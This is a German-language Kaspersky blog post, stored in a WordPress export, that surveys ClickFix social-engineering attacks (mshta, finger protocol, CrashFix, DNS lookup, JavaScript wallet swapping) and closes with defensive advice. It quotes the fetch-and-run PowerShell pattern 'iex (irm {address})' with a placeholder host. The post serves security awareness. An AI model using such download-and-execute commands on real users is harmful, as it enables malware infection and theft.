{"id":33269,"date":"2026-03-13T14:09:44","date_gmt":"2026-03-13T12:09:44","guid":{"rendered":"https:\/\/www.kaspersky.de\/blog\/?p=33269"},"modified":"2026-03-13T14:09:44","modified_gmt":"2026-03-13T12:09:44","slug":"clickfix-attack-variations","status":"publish","type":"post","link":"https:\/\/www.kaspersky.de\/blog\/clickfix-attack-variations\/33269\/","title":{"rendered":"ClickFix-Variationen"},"content":{"rendered":"

Vor etwa einem Jahr gab es in unserem Blog einen Artikel<\/a> \u00fcber die ClickFix-Technik, die sich bei Angreifern wachsender Beliebtheit erfreut. Bei ClickFix-Angriffen wird das Opfer unter verschiedenen Vorw\u00e4nden dazu gebracht, auf seinem Computer einen b\u00f6sartigen Befehl auszuf\u00fchren. F\u00fcr Cybersicherheitsl\u00f6sungen sieht dies aus, als w\u00fcrde der Befehl im Namen des aktiven Nutzers und mit dessen Berechtigungen ausgef\u00fchrt.<\/p>\n

Als diese Technik aufkam, \u00fcberzeugten Cyberkriminelle ihre Opfer einfach davon, einen Befehl auszuf\u00fchren. Als Grund gaben sie an, dadurch w\u00fcrde ein Problem behoben oder ein Captcha gel\u00f6st<\/a>. In den meisten F\u00e4llen handelte es sich bei dem b\u00f6sartigen Befehl um ein PowerShell-Skript. Seitdem haben sich Angreifer eine ganze Reihe neuer Tricks einfallen lassen und es gibt viele neue Varianten zur \u00dcbermittlung b\u00f6sartiger Nutzdaten. Darum ist es wichtig, diese Bedrohungen nicht aus dem Blick zu verlieren.<\/p>\n

Verwendung von mshta.exe<\/em><\/h2>\n

Im vergangenen Jahr ver\u00f6ffentlichten Microsoft-Experten einen Bericht<\/a> \u00fcber Cyberangriffe gegen Hotelbesitzer, die mit Booking.com zusammenarbeiten. Die Angreifer verschickten gef\u00e4lschte Benachrichtigungen des Dienstes oder E-Mails, die angeblich von G\u00e4sten stammten und auf eine Bewertung aufmerksam machten. In beiden F\u00e4llen enthielt die E-Mail einen Link zu einer Website, die Booking.com nachahmte. Dort sollte das Opfer zuerst beweisen, dass es kein Roboter ist. Dazu musste \u00fcber das Men\u00fc \u201eAusf\u00fchren\u201c ein Code ausgef\u00fchrt werden.<\/p>\n

Zwischen diesem Angriff und ClickFix gibt es zwei wesentliche Unterschiede. Erstens wird der Nutzer nicht aufgefordert, eine Codezeile zu kopieren (dies k\u00f6nnte leicht Misstrauen erwecken). Der Code wird von der b\u00f6sartigen Website in die Zwischenablage kopiert. Dies passiert wahrscheinlich, wenn der Nutzer auf ein Kontrollk\u00e4stchen klickt, das den reCAPTCHA-Mechanismus nachahmt. Zweitens ruft die b\u00f6sartige Zeichenfolge das legitime Dienstprogramm mshta.exe<\/em> auf, das dazu dient, in HTML geschriebene Programme auszuf\u00fchren. Das Dienstprogramm kontaktiert dann den Server des Angreifers und f\u00fchrt die b\u00f6sartige Nutzlast aus.<\/p>\n

TikTok-Videos und PowerShell mit Administratorrechten<\/h2>\n

Im Oktober 2025 berichtete<\/a> BleepingComputer \u00fcber eine Kampagne, bei der Malware durch Anleitungen in TikTok-Videos verbreitet wurden. Die Videos sahen aus wie Video-Tutorials zur kostenlosen Aktivierung propriet\u00e4rer Software. Darin wurde der Rat gegeben, PowerShell mit Administratorrechten zu starten und anschlie\u00dfend den Befehl iex (irm {sch\u00e4dliche Adresse})<\/em> auszuf\u00fchren. Der irm-Befehl l\u00e4dt ein sch\u00e4dliches Skript von einem Server der Angreifer herunter und der Befehl iex<\/em> (Invoke-Ausdruck) f\u00fchrt das Skript aus. Das Skript wiederum l\u00e4dt eine Infostealer-Malware auf den angegriffenen Computer nach.<\/p>\n

Verwendung des Finger-Protokolls<\/h2>\n

Eine weitere ungew\u00f6hnliche Variante des ClickFix-Angriffs nutzt<\/a> den bekannten Captcha-Trick. Das b\u00f6sartige Skript wird dabei \u00fcber das veraltete Finger<\/a>-Protokoll geladen. Mit dem gleichnamigen Dienstprogramm k\u00f6nnen Daten \u00fcber einem bestimmten Nutzer auf einem Remote-Server abgefragt werden. Zwar wird das Protokoll heutzutage nur noch selten verwendet, trotzdem wird es von Windows, macOS und einer Reihe Linux-basierter Systeme immer noch unterst\u00fctzt.<\/p>\n

Der Nutzer wird dazu gebracht, die Befehlszeilenschnittstelle zu \u00f6ffnen und dort einen Befehl auszuf\u00fchren, der \u00fcber das Finger-Protokoll (via TCP-Port\u00a079) eine Verbindung mit dem Server des Angreifers aufbaut. Das Protokoll \u00fcbertr\u00e4gt nur Textinformationen. Dies reicht jedoch aus, um ein weiteres Skript auf den Computer des Opfers herunterzuladen, das anschlie\u00dfend die Malware installiert.<\/p>\n

CrashFix-Variante<\/h2>\n

Eine andere Variante von ClickFix unterscheidet sich dadurch, dass sie ausgefeiltes Social Engineering verwendet. Damit wurden Nutzer angegriffen<\/a>, die nach einem Tool suchten, um Werbung, Tracker, Malware und andere unerw\u00fcnschte Inhalte auf Webseiten zu blockieren. Bei der Suche nach einer geeigneten Erweiterung f\u00fcr Google Chrome stie\u00dfen die Opfer auf NexShield\u00a0\u2013 Advanced Web Guardian<\/em>. Diese Erweiterung war zwar der Klon einer funktionierenden Software, brachte den Browser aber irgendwann zum Absturz, informierte f\u00e4lschlicherweise \u00fcber ein Sicherheitsproblem und forderte dazu auf, das Problem durch eine \u201eUntersuchung\u201c zu beheben. Wenn der Nutzer zustimmte, wurde er angewiesen, das Men\u00fc \u201eAusf\u00fchren\u201c zu \u00f6ffnen und einen Befehl auszuf\u00fchren, den die Erweiterung zuvor in die Zwischenablage kopiert hatte.<\/p>\n

Der Befehl kopierte die bereits erw\u00e4hnte Datei finger.exe<\/em> in ein tempor\u00e4res Verzeichnis, benannte sie in ct.exe<\/em> um und startete sie dann mit der Adresse des Angreifers. Der Rest des Angriffs verlief wie der oben genannte Fall. Als Reaktion auf die Anfrage des Finger-Protokolls wurde ein b\u00f6sartiges Skript \u00fcbertragen, das einen Remote-Zugriffs-Trojaner (diesmal ModeloRAT) startete und installierte.<\/p>\n

Malware-Bereitstellung via DNS-Lookup<\/h2>\n

Das Microsoft Threat Intelligence-Team berichtete<\/a> \u00fcber eine noch komplexere ClickFix-Bedrohung. Leider wurde der Social-Engineering-Trick nicht genauer beschrieben, aber die Methode zur \u00dcbermittlung der b\u00f6sartigen Nutzlast ist wirklich interessant. Damit die Erkennung des Angriffs in Unternehmensumgebungen schwerer zu erkennen war und die b\u00f6sartige Infrastruktur m\u00f6glichst lange \u00fcberlebte, bauten die Angreifer einen zus\u00e4tzlichen Schritt ein: den Zugriff auf einen von den Angreifern kontrollierten DNS-Server.<\/p>\n

Etwas genauer: Das Opfer wurde auf irgendeine Weise dazu gebracht, einen b\u00f6sartigen Befehl zu kopieren und auszuf\u00fchren. Dann wurde im Namen des Nutzers \u00fcber das legitime Dienstprogramm nslookup<\/em> an den DNS-Server eine Anfrage gesendet, die Daten f\u00fcr die Dom\u00e4ne example.com<\/em> abfragte. Der Befehl enthielt die Adresse eines DNS-Servers, der von den Angreifern kontrolliert wurde. Dieser gab eine Antwort zur\u00fcck, die unter anderem ein sch\u00e4dliches Skript enthielt, das wiederum die endg\u00fcltige Nutzlast abholte (auch bei diesem Angriff war es ModeloRAT).<\/p>\n

Krypto-K\u00f6der und JavaScript als Nutzlast<\/h2>\n

Die n\u00e4chste Angriffsvariante<\/a> ist aufgrund des mehrstufigen Social Engineering interessant. Die Angreifer verbreiteten in Pastebin-Kommentaren aktiv eine Nachricht \u00fcber einen angeblichen Fehler im Kryptob\u00f6rsen-Service Swapzone.io<\/em>. Kryptobesitzer wurden eingeladen, eine von den Betr\u00fcgern erstellte Ressource zu besuchen. Dort gab es eine genaue Anleitung zur Ausnutzung des Fehlers und es wurde versprochen, man k\u00f6nne in wenigen Tagen bis zu 13.000 US-Dollar \u201everdienen\u201c.<\/p>\n

Es wurde erkl\u00e4rt, wie man aufgrund der Schwachpunkte Kryptoguthaben zu einem g\u00fcnstigen Kurs tauschen konnte. Dazu sollte das Opfer die Website des Dienstes im Chrome-Browser \u00f6ffnen, den Text \u201ejavascript:\u201c in die Adressleiste eintippen und das von der Website des Angreifers kopierte JavaScript-Skript einf\u00fcgen und ausf\u00fchren. In Wirklichkeit hatte das Skript nat\u00fcrlich keinerlei Einfluss auf die Wechselkurse, sondern ersetzte lediglich die Adressen der Bitcoin-Wallets. Sobald das Opfer versuchte, etwas umzutauschen, landete das Geld auf den Konten der Angreifer.<\/p>\n

So sch\u00fctzt du dein Unternehmen vor ClickFix-Angriffen<\/h2>\n

Die einfachsten Angriffe, die die ClickFix-Technik nutzen, lassen sich abwehren, indem die Tastenkombination [Win]<\/strong>+ [R]<\/strong> auf gesch\u00e4ftlichen Ger\u00e4ten blockiert wird. Die oben genannten Beispiele zeigen jedoch, dass es noch viel komplexere Angriffsmethoden gibt, bei denen Nutzer aufgefordert werden, selbst b\u00f6sartigen Code auszuf\u00fchren.<\/p>\n

Daher unser wichtigster Rat: Sch\u00e4rfe bei allen Mitarbeitern das Bewusstsein f\u00fcr Cybersicherheit. Wenn Mitarbeiter aufgefordert werden, das System auf ungew\u00f6hnliche Weise zu manipulieren oder Code zu kopieren und einzuf\u00fcgen, muss klar sein: Hier k\u00f6nnen Cyberkriminelle am Werk sein. F\u00fcr Schulungen zum Sicherheitsbewusstsein eignet sich die Kaspersky Automated Security Awareness Platform<\/a>.<\/p>\n

Zum Schutz vor solchen Cyberangriffen empfehlen wir dar\u00fcber hinaus folgende Ma\u00dfnahmen:<\/p>\n